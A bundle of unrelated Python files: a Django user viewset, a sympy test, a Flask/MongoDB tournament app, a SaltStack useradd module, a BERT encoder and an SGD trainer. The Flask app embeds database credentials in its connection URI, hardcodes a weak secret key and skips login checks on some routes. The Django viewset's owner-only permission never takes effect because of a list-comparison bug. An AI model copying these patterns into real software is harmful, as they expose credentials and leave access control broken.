UserModelSerializer,
AccountVerifySerializer
)
class UserViewSet(
mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
viewsets.GenericViewSet):
"""user view set
handle sign up, login and accointy verifications
Args:
viewsets ([type]): [description]
Returns:
[type]: [description]
"""
queryset = Users.objects.filter(is_active=True, is_cliente=True)
serializer_class = UserModelSerializer
lookup_field = 'username'
def get_permissions(self):
"""Asiigna permision basadas en una accion"""
if self.action in ['signup', 'login', 'verify']:
permissions = [AllowAny]
elif self.action == ['retrieve', 'update', 'partial_update']:
permissions = [IsAuthenticated, IsAccountOwner]
else:
permissions = [IsAuthenticated]
return [permision() for permision in permissions]
@action(detail=False, methods=['post'])
def login(self, request):
"""users sign up"""
serializer = UserLoginSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user, token = serializer.save()
data = {
'user': UserModelSerializer(user).data,
'access_token': token
}
return Response(data, status=status.HTTP_201_CREATED)
@action(detail=False, methods=['post'])
def signup(self, request):
""""User signup"""
serializer = UserSignupSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.save()
data = UserModelSerializer(user).data
return Response(data, status=status.HTTP_201_CREATED)
@action(detail=False, methods=['post'])
def verify(self, request):
serializer = AccountVerifySerializer(data=request.data)
serializer.is_valid(raise_exception=True)
serializer.save()
data = {
'message': 'Congratulations, now go share some rides!'
}
return Response(data, status=status.HTTP_201_CREATED)
@action(detail=True, methods=['put','patch'])
def profile(self,request,*args, **kwargs):
"""update profile data"""
user = self.get_object()
profile = user.profiles
partial = request.method == 'PATH'
serializer = ProfileModelSerializer(
profile,
data = request.data,
partial = partial
)
serializer.is_valid(raise_exception=True)
serializer.save()
data = UserModelSerializer(user).data
return Response(data)
def retrieve(self,request, *args, **kwargs):
"""datros extras para el response"""
response = super(UserViewSet,self).retrieve(request, *args, **kwargs)
circles = Circle.objects.filter(
members = request.user,
membership__is_active = True
)
data = {
'user': response.data,
'circle':CircleModelSerializer(circles, many=True).data,
}
response.data = data
return response |
py | 1a347899c2efc8ae2b8a417dbb422a83cd529c61 | from sympy.ntheory import npartitions
def test_partitions():
assert [npartitions(k) for k in range(13)] == \
[1, 1, 2, 3, 5, 7, 11, 15, 22, 30, 42, 56, 77]
assert npartitions(100) == 190569292
assert npartitions(200) == 3972999029388
assert npartitions(1000) == 24061467864032622473692149727991
assert npartitions(2000) == 4720819175619413888601432406799959512200344166
assert npartitions(10000) % 10**10 == 6916435144
assert npartitions(100000) % 10**10 == 9421098519
|
py | 1a3479e24d789e84df758754665da00b5e93c27f | from flask import Flask, render_template, url_for, session, request, redirect, flash
from flask_pymongo import PyMongo
import bcrypt
app = Flask(__name__)
app.config['MONGO_URI'] = "mongodb+srv://Marco:[email protected]/Ludus-Parthenope?retryWrites=true&w=majority"
mongo = PyMongo(app);
@app.route('/')
def index():
if 'username' in session:
return redirect(url_for('home'))
else:
return render_template('login.html')
@app.route('/login', methods=['POST'])
def login():
users = mongo.db.users
login_user = users.find_one({'name' : request.form['username']})
if login_user:
if bcrypt.hashpw(request.form['pw'].encode('utf-8'), login_user['password']) == login_user['password']:
session['username'] = request.form['username']
try:
session['team'] = login_user['team']
except:
pass
return redirect(url_for('index'))
else:
flash("Username o password errati")
return redirect(url_for('index'))
@app.route('/logout')
def logout():
session.pop('team', None)
session.pop('username', None)
return redirect(url_for('index'))
@app.route('/register', methods=['POST','GET'])
def register():
if request.method == 'POST':
users = mongo.db.users
existing_user = users.find_one({'name' : request.form['username']})
existing_email = users.find_one({'email' : request.form['email']})
if existing_user is None:
if existing_email is None:
hashpass = bcrypt.hashpw(request.form['pw'].encode('utf-8'), bcrypt.gensalt())
users.insert({'name' : request.form['username'], 'password' : hashpass, 'email' : request.form['email']})
session['username'] = request.form['username']
return redirect(url_for('index'))
else:
flash("Questa email è già stata registrata da un altro utente")
return redirect(url_for('register'))
else:
flash("Esiste già un utente con questo username!")
return redirect(url_for('register'))
return render_template('register.html')
@app.route('/home')
def home():
if 'username' in session:
session.database = mongo.db
return render_template('home.html')
else:
return redirect(url_for('index'))
@app.route('/library')
def library():
if 'username' in session:
session.database = mongo.db
return render_template('library.html')
else:
return redirect(url_for('index'))
@app.route('/join/<torneo>')
def join(torneo):
mongo.db.tournaments.update_one({'name': torneo}, {"$addToSet": {'competitors': session['username']}})
return redirect(url_for('home'))
@app.route('/aggiungi',methods=['POST'])
def aggiungi():
newgame = request.form['add']
user_library = mongo.db.users.find_one({"$and":[{'name': session['username']},{'games': newgame}]})
if user_library:
flash("Gioco già presente in libreria")
return redirect(url_for('library'))
else:
mongo.db.users.update_one({'name': session['username'] }, {"$addToSet": {'games': newgame}})
return redirect(url_for('library'))
@app.route('/search',methods=['POST'])
def search():
risultato = mongo.db.tournaments.find_one({'name': request.form['codice']})
if risultato:
session.ricerca = risultato
return render_template('search.html')
else:
flash("Torneo non trovato")
return redirect(url_for('home'))
@app.route('/admin')
def admin():
if session['username'] == "admin":
session.database = mongo.db
return render_template('admin.html')
else:
return redirect(url_for('home'))
@app.route('/addgame',methods=['POST'])
def addgame():
if mongo.db.games.find_one({'title': request.form['newgame']}):
flash("Gioco già presente")
return redirect(url_for('admin'))
else:
mongo.db.games.insert({'title': request.form['newgame']})
flash("Gioco inserito con successo")
return redirect(url_for('admin'))
@app.route('/addtournament',methods=['POST'])
def addtournament():
if mongo.db.tournaments.find_one({'name': request.form['newtournamentid']}):
flash("Torneo già presente")
return redirect(url_for('admin'))
else:
date= request.form['newtournamentdate'] + " " + request.form['newtournamenthour']
mongo.db.tournaments.insert({'name': request.form['newtournamentid'], 'title': request.form['newtournamentgame'], 'date': date})
flash("Torneo inserito con successo")
return redirect(url_for('admin'))
@app.route('/team')
def team():
if 'username' in session:
session.database = mongo.db
return render_template('team.html')
else:
return redirect(url_for('index'))
@app.route('/searchteam',methods=['POST'])
def searchteam():
risultato = mongo.db.teams.find_one({'name': request.form['teamname']})
if risultato:
mongo.db.users.update_one({'name': session['username']},{"$set": {'team': request.form['teamname']}})
mongo.db.teams.update_one({'name': request.form['teamname']},{"$addToSet":{'users': session['username']}})
session['team'] = request.form['teamname']
return redirect(url_for('team'))
else:
flash("Il team inserito non è stato trovato")
return redirect(url_for('team'))
@app.route('/createteam',methods=['POST'])
def createteam():
risultato = mongo.db.teams.find_one({'name': request.form['teamname']})
if risultato:
flash("Esiste già un team con questo nome")
return redirect(url_for('team'))
else:
mongo.db.teams.insert({'name': request.form['teamname']})
mongo.db.users.update_one({'name': session['username']}, {"$set": {'team': request.form['teamname']}})
mongo.db.teams.update_one({'name': request.form['teamname']}, {"$addToSet": {'users': session['username']}})
session['team'] = request.form['teamname']
return redirect(url_for('team'))
@app.route('/leaveteam')
def leaveteam():
mongo.db.users.update_one({'name': session['username']}, {"$unset": {'team': session['team']}})
mongo.db.teams.update_one({'name': session['team']}, {"$pull": {'users': session['username']}})
numero_membri = mongo.db.teams.find_one({'name': session['team']})
if len(numero_membri['users']) == 0:
mongo.db.teams.delete_one({'name': session['team']})
session.pop('team',None)
return redirect(url_for('team'))
if __name__ == '__main__':
app.run()
app.secret_key = 'super secret key'
|
py | 1a347a77cca73722c2d0897138984aa0dc8ca4de |
def squeeze_dims(da, *args, **kwargs):
"""
:param ds: Xarray DataArray
:param args: sequence of arguments
:param kwargs: dictionary of arguments
:return: Xarray DataArray
"""
da_squeezed = da.squeeze(*args, **kwargs)
return da_squeezed
|
py | 1a347a8c8f6b7bc416b425448d8354454411bdc3 | # -*- coding: utf-8 -*-
"""
Manage users with the useradd command
.. important::
If you feel that Salt should be using this module to manage users on a
minion, and it is using a different module (or gives an error similar to
*'user.info' is not available*), see :ref:`here
<module-provider-override>`.
"""
from __future__ import absolute_import, print_function, unicode_literals
import copy
import functools
import logging
import os
# Import salt libs
import salt.utils.data
import salt.utils.decorators.path
import salt.utils.files
import salt.utils.stringutils
import salt.utils.user
from salt.exceptions import CommandExecutionError
# Import 3rd-party libs
from salt.ext import six
try:
import pwd
HAS_PWD = True
except ImportError:
HAS_PWD = False
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = "user"
def __virtual__():
"""
Set the user module if the kernel is Linux, OpenBSD, NetBSD or AIX
"""
if HAS_PWD and __grains__["kernel"] in ("Linux", "OpenBSD", "NetBSD", "AIX"):
return __virtualname__
return (
False,
"useradd execution module not loaded: either pwd python library not available or system not one of Linux, OpenBSD, NetBSD or AIX",
)
def _quote_username(name):
"""
Usernames can only contain ascii chars, so make sure we return a str type
"""
if not isinstance(name, six.string_types):
return str(name) # future lint: disable=blacklisted-function
else:
return salt.utils.stringutils.to_str(name)
def _get_gecos(name, root=None):
"""
Retrieve GECOS field info and return it in dictionary form
"""
if root is not None and __grains__["kernel"] != "AIX":
getpwnam = functools.partial(_getpwnam, root=root)
else:
getpwnam = functools.partial(pwd.getpwnam)
gecos_field = salt.utils.stringutils.to_unicode(
getpwnam(_quote_username(name)).pw_gecos
).split(",", 4)
if not gecos_field:
return {}
else:
# Assign empty strings for any unspecified trailing GECOS fields
while len(gecos_field) < 5:
gecos_field.append("")
return {
"fullname": salt.utils.data.decode(gecos_field[0]),
"roomnumber": salt.utils.data.decode(gecos_field[1]),
"workphone": salt.utils.data.decode(gecos_field[2]),
"homephone": salt.utils.data.decode(gecos_field[3]),
"other": salt.utils.data.decode(gecos_field[4]),
}
def _build_gecos(gecos_dict):
"""
Accepts a dictionary entry containing GECOS field names and their values,
and returns a full GECOS comment string, to be used with usermod.
"""
return "{0},{1},{2},{3},{4}".format(
gecos_dict.get("fullname", ""),
gecos_dict.get("roomnumber", ""),
gecos_dict.get("workphone", ""),
gecos_dict.get("homephone", ""),
gecos_dict.get("other", ""),
).rstrip(",")
def _update_gecos(name, key, value, root=None):
"""
Common code to change a user's GECOS information
"""
if value is None:
value = ""
elif not isinstance(value, six.string_types):
value = six.text_type(value)
else:
value = salt.utils.stringutils.to_unicode(value)
pre_info = _get_gecos(name, root=root)
if not pre_info:
return False
if value == pre_info[key]:
return True
gecos_data = copy.deepcopy(pre_info)
gecos_data[key] = value
cmd = ["usermod"]
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
cmd.extend(("-c", _build_gecos(gecos_data), name))
__salt__["cmd.run"](cmd, python_shell=False)
return _get_gecos(name, root=root).get(key) == value
def add(
name,
uid=None,
gid=None,
groups=None,
home=None,
shell=None,
unique=True,
system=False,
fullname="",
roomnumber="",
workphone="",
homephone="",
other="",
createhome=True,
loginclass=None,
nologinit=False,
root=None,
usergroup=None,
):
"""
Add a user to the minion
name
Username LOGIN to add
uid
User ID of the new account
gid
Name or ID of the primary group of the new account
groups
List of supplementary groups of the new account
home
Home directory of the new account
shell
Login shell of the new account
unique
If not True, the user account can have a non-unique UID
system
Create a system account
fullname
GECOS field for the full name
roomnumber
GECOS field for the room number
workphone
GECOS field for the work phone
homephone
GECOS field for the home phone
other
GECOS field for other information
createhome
Create the user's home directory
loginclass
Login class for the new account (OpenBSD)
nologinit
Do not add the user to the lastlog and faillog databases
root
Directory to chroot into
usergroup
Create and add the user to a new primary group of the same name
CLI Example:
.. code-block:: bash
salt '*' user.add name <uid> <gid> <groups> <home> <shell>
"""
cmd = ["useradd"]
if shell:
cmd.extend(["-s", shell])
if uid not in (None, ""):
cmd.extend(["-u", uid])
if gid not in (None, ""):
cmd.extend(["-g", gid])
elif usergroup:
cmd.append("-U")
if __grains__["kernel"] != "Linux":
log.warning("'usergroup' is only supported on GNU/Linux hosts.")
elif groups is not None and name in groups:
defs_file = "/etc/login.defs"
if __grains__["kernel"] != "OpenBSD":
try:
with salt.utils.files.fopen(defs_file) as fp_:
for line in fp_:
line = salt.utils.stringutils.to_unicode(line)
if "USERGROUPS_ENAB" not in line[:15]:
continue
if "yes" in line:
cmd.extend(["-g", __salt__["file.group_to_gid"](name)])
# We found what we wanted, let's break out of the loop
break
except OSError:
log.debug(
"Error reading %s", defs_file, exc_info_on_loglevel=logging.DEBUG
)
else:
usermgmt_file = "/etc/usermgmt.conf"
try:
with salt.utils.files.fopen(usermgmt_file) as fp_:
for line in fp_:
line = salt.utils.stringutils.to_unicode(line)
if "group" not in line[:5]:
continue
cmd.extend(["-g", line.split()[-1]])
# We found what we wanted, let's break out of the loop
break
except OSError:
# /etc/usermgmt.conf not present: defaults will be used
pass
# Setting usergroup to False adds the -N command argument. If
# usergroup is None, no arguments are added to allow useradd to go
# with the defaults defined for the OS.
if usergroup is False:
cmd.append("-N")
if createhome:
cmd.append("-m")
elif __grains__["kernel"] != "NetBSD" and __grains__["kernel"] != "OpenBSD":
cmd.append("-M")
if nologinit:
cmd.append("-l")
if home is not None:
cmd.extend(["-d", home])
if not unique and __grains__["kernel"] != "AIX":
cmd.append("-o")
if (
system
and __grains__["kernel"] != "NetBSD"
and __grains__["kernel"] != "OpenBSD"
):
cmd.append("-r")
if __grains__["kernel"] == "OpenBSD":
if loginclass is not None:
cmd.extend(["-L", loginclass])
cmd.append(name)
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
ret = __salt__["cmd.run_all"](cmd, python_shell=False)
if ret["retcode"] != 0:
return False
# At this point, the user was successfully created, so return true
# regardless of the outcome of the below functions. If there is a
# problem wth changing any of the user's info below, it will be raised
# in a future highstate call. If anyone has a better idea on how to do
# this, feel free to change it, but I didn't think it was a good idea
# to return False when the user was successfully created since A) the
# user does exist, and B) running useradd again would result in a
# nonzero exit status and be interpreted as a False result.
if groups:
chgroups(name, groups, root=root)
if fullname:
chfullname(name, fullname, root=root)
if roomnumber:
chroomnumber(name, roomnumber, root=root)
if workphone:
chworkphone(name, workphone, root=root)
if homephone:
chhomephone(name, homephone, root=root)
if other:
chother(name, other, root=root)
return True
def delete(name, remove=False, force=False, root=None):
"""
Remove a user from the minion
name
Username to delete
remove
Remove home directory and mail spool
force
Force some actions that would fail otherwise
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.delete name remove=True force=True
"""
cmd = ["userdel"]
if remove:
cmd.append("-r")
if force and __grains__["kernel"] != "OpenBSD" and __grains__["kernel"] != "AIX":
cmd.append("-f")
cmd.append(name)
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
ret = __salt__["cmd.run_all"](cmd, python_shell=False)
if ret["retcode"] == 0:
# Command executed with no errors
return True
if ret["retcode"] == 12:
# There's a known bug in Debian based distributions, at least, that
# makes the command exit with 12, see:
# https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1023509
if __grains__["os_family"] not in ("Debian",):
return False
if "var/mail" in ret["stderr"] or "var/spool/mail" in ret["stderr"]:
# We've hit the bug, let's log it and not fail
log.debug(
"While the userdel exited with code 12, this is a known bug on "
"debian based distributions. See http://goo.gl/HH3FzT"
)
return True
return False
def getent(refresh=False, root=None):
"""
Return the list of all info for all users
refresh
Force a refresh of user information
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.getent
"""
if "user.getent" in __context__ and not refresh:
return __context__["user.getent"]
ret = []
if root is not None and __grains__["kernel"] != "AIX":
getpwall = functools.partial(_getpwall, root=root)
else:
getpwall = functools.partial(pwd.getpwall)
for data in getpwall():
ret.append(_format_info(data))
__context__["user.getent"] = ret
return ret
def _chattrib(name, key, value, param, persist=False, root=None):
"""
Change an attribute for a named user
"""
pre_info = info(name, root=root)
if not pre_info:
raise CommandExecutionError("User '{0}' does not exist".format(name))
if value == pre_info[key]:
return True
cmd = ["usermod"]
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
if persist and __grains__["kernel"] != "OpenBSD":
cmd.append("-m")
cmd.extend((param, value, name))
__salt__["cmd.run"](cmd, python_shell=False)
return info(name, root=root).get(key) == value
def chuid(name, uid, root=None):
"""
Change the uid for a named user
name
User to modify
uid
New UID for the user account
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chuid foo 4376
"""
return _chattrib(name, "uid", uid, "-u", root=root)
def chgid(name, gid, root=None):
"""
Change the default group of the user
name
User to modify
gid
Force use GID as new primary group
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chgid foo 4376
"""
return _chattrib(name, "gid", gid, "-g", root=root)
def chshell(name, shell, root=None):
"""
Change the default shell of the user
name
User to modify
shell
New login shell for the user account
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chshell foo /bin/zsh
"""
return _chattrib(name, "shell", shell, "-s", root=root)
def chhome(name, home, persist=False, root=None):
"""
Change the home directory of the user, pass True for persist to move files
to the new home directory if the old home directory exist.
name
User to modify
home
New home directory for the user account
persist
Move contents of the home directory to the new location
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chhome foo /home/users/foo True
"""
return _chattrib(name, "home", home, "-d", persist=persist, root=root)
def chgroups(name, groups, append=False, root=None):
"""
Change the groups to which this user belongs
name
User to modify
groups
Groups to set for the user
append : False
If ``True``, append the specified group(s). Otherwise, this function
will replace the user's groups with the specified group(s).
root
Directory to chroot into
CLI Examples:
.. code-block:: bash
salt '*' user.chgroups foo wheel,root
salt '*' user.chgroups foo wheel,root append=True
"""
if isinstance(groups, six.string_types):
groups = groups.split(",")
ugrps = set(list_groups(name))
if ugrps == set(groups):
return True
cmd = ["usermod"]
if __grains__["kernel"] != "OpenBSD":
if append and __grains__["kernel"] != "AIX":
cmd.append("-a")
cmd.append("-G")
else:
if append:
cmd.append("-G")
else:
cmd.append("-S")
if append and __grains__["kernel"] == "AIX":
cmd.extend([",".join(ugrps) + "," + ",".join(groups), name])
else:
cmd.extend([",".join(groups), name])
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
result = __salt__["cmd.run_all"](cmd, python_shell=False)
# try to fallback on gpasswd to add user to localgroups
# for old lib-pamldap support
if __grains__["kernel"] != "OpenBSD" and __grains__["kernel"] != "AIX":
if result["retcode"] != 0 and "not found in" in result["stderr"]:
ret = True
for group in groups:
cmd = ["gpasswd", "-a", name, group]
if __salt__["cmd.retcode"](cmd, python_shell=False) != 0:
ret = False
return ret
return result["retcode"] == 0
def chfullname(name, fullname, root=None):
"""
Change the user's Full Name
name
User to modify
fullname
GECOS field for the full name
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chfullname foo "Foo Bar"
"""
return _update_gecos(name, "fullname", fullname, root=root)
def chroomnumber(name, roomnumber, root=None):
"""
Change the user's Room Number
CLI Example:
.. code-block:: bash
salt '*' user.chroomnumber foo 123
"""
return _update_gecos(name, "roomnumber", roomnumber, root=root)
def chworkphone(name, workphone, root=None):
"""
Change the user's Work Phone
name
User to modify
workphone
GECOS field for the work phone
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chworkphone foo 7735550123
"""
return _update_gecos(name, "workphone", workphone, root=root)
def chhomephone(name, homephone, root=None):
"""
Change the user's Home Phone
name
User to modify
homephone
GECOS field for the home phone
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chhomephone foo 7735551234
"""
return _update_gecos(name, "homephone", homephone, root=root)
def chother(name, other, root=None):
"""
Change the user's other GECOS attribute
name
User to modify
other
GECOS field for other information
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.chother foobar
"""
return _update_gecos(name, "other", other, root=root)
def chloginclass(name, loginclass, root=None):
"""
Change the default login class of the user
name
User to modify
loginclass
Login class for the new account
root
Directory to chroot into
.. note::
This function only applies to OpenBSD systems.
CLI Example:
.. code-block:: bash
salt '*' user.chloginclass foo staff
"""
if __grains__["kernel"] != "OpenBSD":
return False
if loginclass == get_loginclass(name):
return True
cmd = ["usermod", "-L", loginclass, name]
if root is not None and __grains__["kernel"] != "AIX":
cmd.extend(("-R", root))
__salt__["cmd.run"](cmd, python_shell=False)
return get_loginclass(name) == loginclass
def info(name, root=None):
"""
Return user information
name
User to get the information
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.info root
"""
# If root is provided, we use a less portable solution that
# depends on analyzing /etc/passwd manually. Of course we cannot
# find users from NIS nor LDAP, but in those cases do not makes
# sense to provide a root parameter.
#
# Please, note that if the non-root /etc/passwd file is long the
# iteration can be slow.
if root is not None and __grains__["kernel"] != "AIX":
getpwnam = functools.partial(_getpwnam, root=root)
else:
getpwnam = functools.partial(pwd.getpwnam)
try:
data = getpwnam(_quote_username(name))
except KeyError:
return {}
else:
return _format_info(data)
def get_loginclass(name):
"""
Get the login class of the user
name
User to get the information
.. note::
This function only applies to OpenBSD systems.
CLI Example:
.. code-block:: bash
salt '*' user.get_loginclass foo
"""
if __grains__["kernel"] != "OpenBSD":
return False
userinfo = __salt__["cmd.run_stdout"](["userinfo", name], python_shell=False)
for line in userinfo.splitlines():
if line.startswith("class"):
try:
ret = line.split(None, 1)[1]
break
except (ValueError, IndexError):
continue
else:
ret = ""
return ret
def _format_info(data):
"""
Return user information in a pretty way
"""
# Put GECOS info into a list
gecos_field = salt.utils.stringutils.to_unicode(data.pw_gecos).split(",", 4)
# Make sure our list has at least five elements
while len(gecos_field) < 5:
gecos_field.append("")
return {
"gid": data.pw_gid,
"groups": list_groups(data.pw_name),
"home": data.pw_dir,
"name": data.pw_name,
"passwd": data.pw_passwd,
"shell": data.pw_shell,
"uid": data.pw_uid,
"fullname": gecos_field[0],
"roomnumber": gecos_field[1],
"workphone": gecos_field[2],
"homephone": gecos_field[3],
"other": gecos_field[4],
}
@salt.utils.decorators.path.which("id")
def primary_group(name):
"""
Return the primary group of the named user
.. versionadded:: 2016.3.0
name
User to get the information
CLI Example:
.. code-block:: bash
salt '*' user.primary_group saltadmin
"""
return __salt__["cmd.run"](["id", "-g", "-n", name])
def list_groups(name):
"""
Return a list of groups the named user belongs to
name
User to get the information
CLI Example:
.. code-block:: bash
salt '*' user.list_groups foo
"""
return salt.utils.user.get_group_list(name)
def list_users(root=None):
"""
Return a list of all users
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.list_users
"""
if root is not None and __grains__["kernel"] != "AIX":
getpwall = functools.partial(_getpwall, root=root)
else:
getpwall = functools.partial(pwd.getpwall)
return sorted([user.pw_name for user in getpwall()])
def rename(name, new_name, root=None):
"""
Change the username for a named user
name
User to modify
new_name
New value of the login name
root
Directory to chroot into
CLI Example:
.. code-block:: bash
salt '*' user.rename name new_name
"""
if info(new_name, root=root):
raise CommandExecutionError("User '{0}' already exists".format(new_name))
return _chattrib(name, "name", new_name, "-l", root=root)
def _getpwnam(name, root=None):
"""
Alternative implementation for getpwnam, that use only /etc/passwd
"""
root = "/" if not root else root
passwd = os.path.join(root, "etc/passwd")
with salt.utils.files.fopen(passwd) as fp_:
for line in fp_:
line = salt.utils.stringutils.to_unicode(line)
comps = line.strip().split(":")
if comps[0] == name:
# Generate a getpwnam compatible output
comps[2], comps[3] = int(comps[2]), int(comps[3])
return pwd.struct_passwd(comps)
raise KeyError
def _getpwall(root=None):
"""
Alternative implemetantion for getpwall, that use only /etc/passwd
"""
root = "/" if not root else root
passwd = os.path.join(root, "etc/passwd")
with salt.utils.files.fopen(passwd) as fp_:
for line in fp_:
line = salt.utils.stringutils.to_unicode(line)
comps = line.strip().split(":")
# Generate a getpwall compatible output
comps[2], comps[3] = int(comps[2]), int(comps[3])
yield pwd.struct_passwd(comps)
|
py | 1a347b1a74ae4ba264db66db8d443d345ba67834 | import whale as wh
from tensorflow.python.layers.base import Layer
from .activations import gelu_new
from .attention import Attention
from .core import dense_dropoutput_layernorm, Dense
from .utils import get_initializer
class Block(Layer):
def __init__(self, config, **kwargs):
super(Block, self).__init__(**kwargs)
self.attention = Attention(config, name="attention")
# Use gelu_new, then match results
self.intermediate = Dense(
units=config.intermediate_size,
activation=gelu_new,
kernel_initializer=get_initializer(config.initializer_range),
name="intermediate/dense")
self.bert_output = dense_dropoutput_layernorm(config, name="output")
def call(self, inputs, training=False):
hidden_states, attention_mask = inputs
attention_output = self.attention([hidden_states, attention_mask], training=training)
intermediate_output = self.intermediate(attention_output)
layer_output = self.bert_output([intermediate_output, attention_output], training=training)
return layer_output, attention_output
class Encoder(Layer):
def __init__(self, config, **kwargs):
super(Encoder, self).__init__(**kwargs)
self.layer = [Block(config, name="layer_{}".format(i)) for i in range(config.num_hidden_layers)]
#self.layer = [Block(config, name="layer_{}".format(i)) for i in range(3)]
def _stage_call(self, layer_index, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training):
layer_output, att_output = self.layer[layer_index]([hidden_states, attention_mask], training=training)
hidden_states = layer_output
all_hidden_states = all_hidden_states + (hidden_states,)
all_att_outputs = all_att_outputs + (att_output, )
return all_hidden_states, all_att_outputs, hidden_states
def call_bak(self, inputs, training=False):
hidden_states, attention_mask = inputs
all_hidden_states = ()
all_att_outputs = ()
bert_large_layers_count = 12
assert len(self.layer) == bert_large_layers_count
# Use default scope.
for i in range(0, 2):
all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
# with wh.stage():
# for i in range(each_stage_layers_count, 2*each_stage_layers_count):
# all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
with wh.stage():
for i in range(2, 12):
all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
wh.current_scope_as_default()
final_outputs = []
for hidden_states in all_hidden_states:
final_outputs.append(hidden_states)
return final_outputs, all_att_outputs
def call(self, inputs, training=False):
hidden_states, attention_mask = inputs
all_hidden_states = ()
all_att_outputs = ()
bert_large_layers_count = 12
assert len(self.layer) == bert_large_layers_count
# Use default scope.
for i in range(0, bert_large_layers_count):
all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
# with wh.stage():
# for i in range(each_stage_layers_count, 2*each_stage_layers_count):
# all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
"""
with wh.stage():
for i in range(2, 12):
all_hidden_states, all_att_outputs, hidden_states = self._stage_call(i, all_hidden_states, all_att_outputs, hidden_states, attention_mask, training)
wh.current_scope_as_default()
"""
final_outputs = []
for hidden_states in all_hidden_states:
final_outputs.append(hidden_states)
return final_outputs, all_att_outputs
|
py | 1a347b7a4d813bda20e345004372629dd1b1bbec | import numpy as np
class ClassifierTrainer(object):
""" The trainer class performs SGD with momentum on a cost function """
def __init__(self):
self.step_cache = {} # for storing velocities in momentum update
def train(self, X, y, X_val, y_val,
model, loss_function,
reg=0.0,
learning_rate=1e-2, momentum=0, learning_rate_decay=0.95,
update='momentum', sample_batches=True,
num_epochs=30, batch_size=100, acc_frequency=None,
verbose=False):
"""
Optimize the parameters of a model to minimize a loss function. We use
training data X and y to compute the loss and gradients, and periodically
check the accuracy on the validation set.
Inputs:
- X: Array of training data; each X[i] is a training sample.
- y: Vector of training labels; y[i] gives the label for X[i].
- X_val: Array of validation data
- y_val: Vector of validation labels
- model: Dictionary that maps parameter names to parameter values. Each
parameter value is a numpy array.
- loss_function: A function that can be called in the following ways:
scores = loss_function(X, model, reg=reg)
loss, grads = loss_function(X, model, y, reg=reg)
- reg: Regularization strength. This will be passed to the loss function.
- learning_rate: Initial learning rate to use.
- momentum: Parameter to use for momentum updates.
- learning_rate_decay: The learning rate is multiplied by this after each
epoch.
- update: The update rule to use. One of 'sgd', 'momentum', or 'rmsprop'.
- sample_batches: If True, use a minibatch of data for each parameter update
(stochastic gradient descent); if False, use the entire training set for
each parameter update (gradient descent).
- num_epochs: The number of epochs to take over the training data.
- batch_size: The number of training samples to use at each iteration.
- acc_frequency: If set to an integer, we compute the training and
validation set error after every acc_frequency iterations.
- verbose: If True, print status after each epoch.
Returns a tuple of:
- best_model: The model that got the highest validation accuracy during
training.
- loss_history: List containing the value of the loss function at each
iteration.
- train_acc_history: List storing the training set accuracy at each epoch.
- val_acc_history: List storing the validation set accuracy at each epoch.
"""
N = X.shape[0]
if sample_batches:
iterations_per_epoch = N / batch_size # using SGD
else:
iterations_per_epoch = 1 # using GD
num_iters = num_epochs * iterations_per_epoch
epoch = 0
best_val_acc = 0.0
best_model = {}
loss_history = []
train_acc_history = []
val_acc_history = []
for it in xrange(num_iters):
if it % 500 == 0: print 'starting iteration ', it
# get batch of data
if sample_batches:
batch_mask = np.random.choice(N, batch_size)
X_batch = X[batch_mask]
y_batch = y[batch_mask]
else:
# no SGD used, full gradient descent
X_batch = X
y_batch = y
# evaluate cost and gradient
cost, grads = loss_function(X_batch, model, y_batch, reg)
loss_history.append(cost)
# perform a parameter update
for p in model:
# compute the parameter step
if update == 'sgd':
dx = -learning_rate * grads[p]
elif update == 'momentum':
if not p in self.step_cache:
self.step_cache[p] = np.zeros(grads[p].shape)
# dx = np.zeros_like(grads[p]) # you can remove this after
#####################################################################
# TODO: implement the momentum update formula and store the step #
# update into variable dx. You should use the variable #
# step_cache[p] and the momentum strength is stored in momentum. #
# Don't forget to also update the step_cache[p]. #
#####################################################################
self.step_cache[p] = momentum * self.step_cache[p] - learning_rate * grads[p]
dx = self.step_cache[p]
elif update == 'rmsprop':
decay_rate = 0.99 # you could also make this an option
if not p in self.step_cache:
self.step_cache[p] = np.zeros(grads[p].shape)
#####################################################################
# TODO: implement the RMSProp update and store the parameter update #
# dx. Don't forget to also update step_cache[p]. Use smoothing 1e-8 #
#####################################################################
self.step_cache[p] = decay_rate * self.step_cache[p] + ( 1 - decay_rate ) * ( grads[p] ** 2 )
dx = - learning_rate * grads[p] / np.sqrt( self.step_cache[p] + 1e-8)
else:
raise ValueError('Unrecognized update type "%s"' % update)
# update the parameters
model[p] += dx
# every epoch perform an evaluation on the validation set
first_it = (it == 0)
epoch_end = (it + 1) % iterations_per_epoch == 0
